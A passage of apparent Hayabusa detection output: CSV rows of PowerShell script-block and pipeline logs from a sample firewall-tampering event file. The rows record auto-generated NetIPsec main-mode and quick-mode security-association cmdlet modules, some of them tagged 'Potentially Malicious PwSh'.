$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.477 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.480 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.499 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = 